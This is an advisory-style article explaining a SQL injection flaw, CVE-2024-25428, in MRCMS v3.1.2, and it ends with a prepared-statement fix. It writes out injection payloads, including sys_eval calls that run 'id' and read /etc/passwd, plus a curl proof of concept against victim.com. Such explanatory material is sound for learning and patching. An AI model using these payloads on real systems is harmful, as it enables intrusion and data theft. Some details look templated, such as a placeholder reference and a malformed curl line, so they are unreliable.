CVE CyberSecurity Database News

CVE-2024-25428 - How Hackers Can Exploit SQL Injection in MRCMS v3.1.2 to Run System Commands

Poster -

In February 2024, a critical security flaw—CVE-2024-25428—was announced for MRCMS version 3.1.2, a popular content management system used in various web applications. This vulnerability opens the door to SQL Injection through the status parameter, allowing attackers to execute arbitrary system commands on the affected server.

This post will break down the vulnerability step by step, provide code snippets, show how attackers can exploit it, and link to original references, all in simple, easy-to-understand language.

Impact: Attackers can inject malicious SQL and execute system commands.

MRCMS is commonly used for managing websites, and security issues can affect thousands of users if not properly patched.

Where’s the Vulnerability?

MRCMS v3.1.2 has a page that handles requests with a status parameter. The back-end PHP code does not filter or escape the user input sufficiently, making SQL Injection possible.

Example vulnerable PHP code

$status = $_GET['status'];
$sql = "SELECT * FROM users WHERE status = '$status'";
$result = mysqli_query($conn, $sql);

> The variable $status comes directly from the user’s input and is inserted straight into the SQL query.

If someone submits status=active, the query is safe. But if an attacker submits SQL code like status=active' OR 1=1 --, the query becomes:

SELECT * FROM users WHERE status = 'active' OR 1=1 -- '

Now it always returns all users.

But it gets much worse—attackers can chain this injection with database functions that allow running system commands.

Step 1: Injection that Runs System Commands

Some databases (like MySQL with certain permissions enabled) allow you to use functions like sys_eval() or xp_cmdshell to execute operating system commands from SQL.

For example, an attacker could set

status=active'; SELECT sys_eval('id'); --

If sys_eval() is enabled, this will run the Linux id command on the server!

Step 2: Getting a Web Shell

A determined attacker could also use SQL injection to write a backdoor web shell to the server’s public HTML directory (if permissions allow), enabling full remote control.

Request

GET /users.php?status=active'; SELECT sys_eval('cat /etc/passwd'); --
Host: victim.com

If the server is vulnerable and permissions allow, this will leak sensitive contents from /etc/passwd.

Proof-of-Concept (PoC) using curl

curl "http://victim.com/users.php?status=active';; SELECT sys_eval('id'); --"

If sys_eval is unavailable, attackers may use other SQL features or error-based injection to exfiltrate data, or blind injection techniques to interact with the OS.

Update MRCMS: The maintainers have released a fixed version; download and install it.

- Escape User Input: Use prepared statements in all database interactions, never directly interpolate user input.

Fixed code example

$status = $_GET['status'];
$stmt = $conn->prepare('SELECT * FROM users WHERE status = ?');
$stmt->bind_param('s', $status);
$stmt->execute();

References

- Original CVE entry (MITRE)
- ExploitDB entry *(placeholder example, update as available)*
- MRCMS official site / patches

Conclusion

CVE-2024-25428 is a dangerous SQL injection vulnerability in MRCMS v3.1.2, and it can let hackers run system commands on your server. If your site uses MRCMS, update immediately and check your code for unsafe SQL practices. Never trust user input—sanitize everything!

Have questions? Let us know in the comments or see the references above for more details.

Timeline

Published on: 02/20/2024 22:15:08 UTC
Last modified on: 03/13/2025 19:15:43 UTC